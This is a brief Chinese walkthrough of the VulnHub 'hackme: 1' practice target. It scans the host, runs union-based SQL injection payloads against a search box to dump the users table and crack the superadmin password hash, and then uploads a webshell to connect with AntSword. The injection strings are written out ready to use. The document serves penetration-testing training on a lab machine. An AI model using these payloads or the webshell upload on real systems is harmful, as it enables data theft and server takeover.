靶场介绍:
靶机下载地址:
hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/
首先虚拟机建一个hackme靶机 切换nat模式 然后kali扫描自己全端口
nmap -sV ip段 0/24 扫描出ip进行访问
发现是个登录页面可以注册先注册然后登录
发现是搜索框,我们直接用搜索型的sql注入
判断用什么注入
经过实验 得出 我们可以使用 booktitle下的名字加’ and 1=1#
也就是说 使用 CISSP Guide' and 1=1#
CISSP Guide' and 1=2#
使用union联合注入 查看数据库名字
CISSP Guide' union select 1,2,database() #
得出数据库名,查看数据库下的表名,可以通过group_concat()函数拼接显示所有表名:
CISSP Guide' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='webapphacking' #
查看users表下的字段
CISSP Guide' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #
获取字段下的数据
CISSP Guide' union select user,name,pasword from users #
经过尝试为 superadmin 2386acb2cf356944177746fc92523983 SGD
确定为这个账号 将密码md5解密
解密出密码为 Uncrackable 然后去登录
发现可以上传图片 我们就可以尝试一下上传木马
已上传至uploads文件夹里 访问一下
访问成功,使用蚁剑连接一下
添加获得查看信息